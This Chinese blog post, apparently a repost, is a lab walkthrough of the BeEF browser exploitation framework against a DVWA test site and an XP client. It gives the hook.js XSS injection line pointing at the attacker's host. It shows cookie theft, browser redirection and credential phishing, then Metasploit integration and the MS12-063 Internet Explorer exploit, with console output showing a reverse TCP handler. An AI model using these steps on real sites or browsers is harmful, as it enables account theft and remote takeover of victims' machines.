赞
踩
BeEF( The Browser Exploitation Framework)
是由Wade Alcorn 在2006年开始创建的,是由ruby语言开发的专门针对浏览器攻击的框架。BeeF是前欧美最流行的web框架攻击平台,kali 集成BeEf,而且BeEf有很多好使的payload。例如BeEF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机。
不过在目前,BeEF使用的人比较少,并且在新版Kali中已经没有默认安装了,这里简单记录下BeEF的使用。
测试环境:任意存在XSS
漏洞的站点及kali2019
;
注意如果是在新版kali中则可以使用apt-get install beef-xss
进行安装。
直接在命令行输入xss-beef
即可使用,我这里多了一个提示,需要改变缺省密码,它的缺省密码是beef/beef
。
当程序启动完毕后,会自动打开浏览器,出现登陆界面。
当然也可以根据之前的Log信息进行操作,上面也有写登陆的地址,直接登陆这个地址也是可以的。
接下来,将上面的Hook
打入到XSS
漏洞环境中,这里要记得将<IP>
换成kali
的IP地址,这里拿都知道的DVWA靶场
举例。
<script src="http://192.168.181.141:3000/hook.js"></script>
直接插进去就行了。
然后登陆beef查看上线主机。
点击上线主机后,可以看到一些对应的信息。
点击command
可以看到支持的攻击模块
这里由于软件有较久没有更新模块内容,所以有些功能可能无法使用的,可以通过命令前面的颜色来判断
这里拿Browser
举例。
使用绿色的Get Cookie
点击Execute
可以看到对应的信息
再拿橙色的Redirect Browser
举例
点击Execute
后用户界面会跳转到百度。
显示命令执行成功,查看客户端页面。
已经跳转成功,还可以使用社工模块中的弹窗等。
别说,还挺像的。。
输入后,可以在后台收到用户名密码信息
另外BeEF还可以联动MSF一起使用,不过具体功能还得大家自行研究了,这里贴下联动的方法。
首先更改BeEF的第一个配置文件,开启MSF的加载模块。
vim /usr/share/beef-xss/config.yaml
另外需要修改扩展模块中的MSF配置文件
vim /usr/share/beef-xss/extensions/metasploit/config.yaml
保证红框内的配置即可,接着进MSF加载模块
load msgrpc ServerHost=127.0.0.1 User=msf Pass=abc123
这里区分大小写,密码在刚刚的配置文件里面有
最后一步,去beef-xss
目录下通过./xss-beef
启动才行。
cd /usr/share/beef-xss/
./beef
再次登陆BeEF
就可以看到已经加载了MSF
模块了。
这里就可以通过加载好的msf
模块直接打了,不过找了一圈也没看到可以直接利用的。。。这大概就是不香了的原因吧,最后换个机器xp
玩一下。
MSF
使用MS12-063
漏洞,配合BeEF
完成getshell
由于MS12-063
针对IE7/8/9
有效果,这里客户机用XP
测试,哎,用这么老的机器测试就是玩。
XP
访问存储型XSS
上线至BeEF
。
接着选择msf
模块中的ms12-063
命令模块,填入对应的payload
直接执行,本以为完事了,结果。。。
一直loading
,shell
拿到,没办法只能去msf
中玩了。
#后来想了下也测试过了,其实这里还是去`rediresct brower`那里去控制客户端访问一次生成的页面就可以了。
#比如这里需要让他访问http://192.168.181.141:8888,才能正常上线
#而且正常上线后,这个地方还是会loading,也得去msf中才能看到shell,感觉没啥意义。。。
msf6 > search ms12-063
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/browser/ie_execcommand_uaf 2012-09-14 good No MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability
接着进入模块后进行设置
msf6 > use exploit/windows/browser/ie_execcommand_uaf
msf6 exploit(windows/browser/ie_execcommand_uaf) > set uripath /
uripath => /
msf6 exploit(windows/browser/ie_execcommand_uaf) > exploit
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.181.141:4445
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.181.141:8080/
[*] Server started.
接着在BeEF
中使用Redirect Brower
功能让客户机访问http://192.168.181.141:8080/
。
再去看MSF
,就上线了。
没想到上周临时的想法试着去申请下博客专家,今天就收到消息,来了来了,CSDN认证博客专家
,GOT it,新的开始,继续加油!
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。